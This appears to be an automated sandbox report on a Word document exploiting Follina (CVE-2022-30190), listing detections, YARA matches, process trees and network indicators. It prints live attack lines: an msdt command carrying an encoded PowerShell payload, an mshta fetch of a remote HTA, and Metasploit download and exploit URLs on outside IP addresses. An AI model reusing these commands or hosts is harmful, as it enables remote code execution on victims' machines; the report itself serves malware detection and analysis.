Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
V3g2Pfu707.docx

Overview

General Information

Sample Name:V3g2Pfu707.docx
Analysis ID:647003
MD5:b60cd79e2c14dbeefa22197f76fc3437
SHA1:07a2811a3ea7a4a0c84e52cb5a48f1e712b55fd9
SHA256:6ddab79a6d836f9c1ed9ab3bbe28a074c0c93bd87f55144ed62b23c0032715d1
Tags:CVE-2022-30190docfollina
Infos:

Detection

Metasploit, Follina CVE-2022-30190
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Uses known network protocols on non-standard ports
Detected suspicious Microsoft Office reference URL
Contains an external reference to another file
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
Found dropped PE file which has not been started or loaded
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 6308 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 6532 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 7052 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 4208 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 6940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 3400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • mshta.exe (PID: 5852 cmdline: "C:\Windows\system32\mshta.exe" http://159.75.135.162:61256/dllhost.hta MD5: 7083239CE743FDB68DFC933B7308E80A)
  • csc.exe (PID: 5532 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6988 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • EXCEL.EXE (PID: 400 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 2396 cmdline: C:\Windows\\SysWOW64\\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
{"Headers": "Accept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: https://www.microsoft.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_07_00) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\r\n", "Type": "Metasploit Download", "URL": "http://106.55.17.200/jquery-3.3.1.slim.min.js"}
SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x552:$a2: TargetMode="External"
  • 0x54a:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x507:$olerel: relationships/oleObject
  • 0x520:$target1: Target="http
  • 0x552:$mode: TargetMode="External
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x1447:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x1447:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x1447:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        Click to see the 2 entries
        SourceRuleDescriptionAuthorStrings
        00000019.00000003.506676110.000000000626D000.00000004.00000800.00020000.00000000.sdmpCobaltbaltstrike_Payload_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
        • 0x2d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
        00000019.00000003.499865318.0000000006E54000.00000004.00000800.00020000.00000000.sdmpCobaltbaltstrike_Payload_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
        • 0xf0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
        00000019.00000003.498703501.000000000583F000.00000004.00000800.00020000.00000000.sdmpCobaltbaltstrike_Payload_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
        • 0x90e:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
        00000019.00000003.500021102.0000000006E34000.00000004.00000800.00020000.00000000.sdmpCobaltbaltstrike_Payload_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
        • 0x2b78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
        00000019.00000003.500164196.0000000006E17000.00000004.00000800.00020000.00000000.sdmpCobaltbaltstrike_Payload_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
        • 0x2800:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
        Click to see the 170 entries
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: V3g2Pfu707.docxVirustotal: Detection: 33%Perma Link
        Source: V3g2Pfu707.docxReversingLabs: Detection: 29%
        Source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "Accept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: https://www.microsoft.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_07_00) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\r\n", "Type": "Metasploit Download", "URL": "http://106.55.17.200/jquery-3.3.1.slim.min.js"}

        Exploits

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm, type: DROPPED
        Source: document.xml.relsExtracted files from sample: http://101.33.231.81:62563/exploit.html!
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

        Software Vulnerabilities

        barindex
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
        Source: global trafficTCP traffic: 192.168.2.3:49746 -> 101.33.231.81:62563
        Source: global trafficTCP traffic: 192.168.2.3:49749 -> 101.33.231.81:62563
        Source: winword.exeMemory has grown: Private usage: 0MB later: 95MB

        Networking

        barindex
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 61256
        Source: unknownNetwork traffic detected: HTTP traffic on port 61256 -> 49781
        Source: Malware configuration extractorURLs: http://106.55.17.200/jquery-3.3.1.slim.min.js
        Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
        Source: global trafficHTTP traffic detected: GET /exploit.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 101.33.231.81:62563Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /exploit.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 101.33.231.81:62563If-Modified-Since: Tue, 14 Jun 2022 15:37:10 GMT; length=5737Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dllhost.hta HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 159.75.135.162:61256Connection: Keep-Alive
        Source: global trafficTCP traffic: 192.168.2.3:49746 -> 101.33.231.81:62563
        Source: global trafficTCP traffic: 192.168.2.3:49781 -> 159.75.135.162:61256
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: ~WRS{9C7F191B-1B19-4530-878D-79768D2CF994}.tmp.0.drString found in binary or memory: http://101.33.231.81:62563/exploit.html
        Source: mshta.exe, 00000019.00000002.559346713.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559444903.0000000000A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.hta
        Source: mshta.exe, 00000019.00000002.558415681.0000000000860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaC:
        Source: mshta.exe, 00000019.00000002.559444903.0000000000A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaET4.C:
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaV
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaY
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htag
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaindowsINetCookiesF&
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htanation
        Source: mshta.exe, 00000019.00000002.559463077.0000000000A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaocess
        Source: mshta.exe, 00000019.00000002.561330610.0000000000D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htata
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
        Source: rundll32.exe, 0000001E.00000002.557013921.0000000002E3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: rundll32.exe, 0000001E.00000002.557013921.0000000002E3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: rundll32.exe, 0000001E.00000002.557013921.0000000002E3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab3
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: rundll32.exe, 0000001E.00000002.556934937.0000000002E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://106.55.17.200/
        Source: rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://106.55.17.200:62002/
        Source: rundll32.exe, 0000001E.00000002.556915406.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556560356.0000000002D6B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://106.55.17.200:62002/jquery-3.3.1.slim.min.js
        Source: rundll32.exe, 0000001E.00000002.556915406.0000000002E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://106.55.17.200:62002/jquery-3.3.1.slim.min.js9
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.aadrm.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.aadrm.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.cortana.ai
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.diagnostics.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.office.net
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.onedrive.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://augloop.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cdn.entity.
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
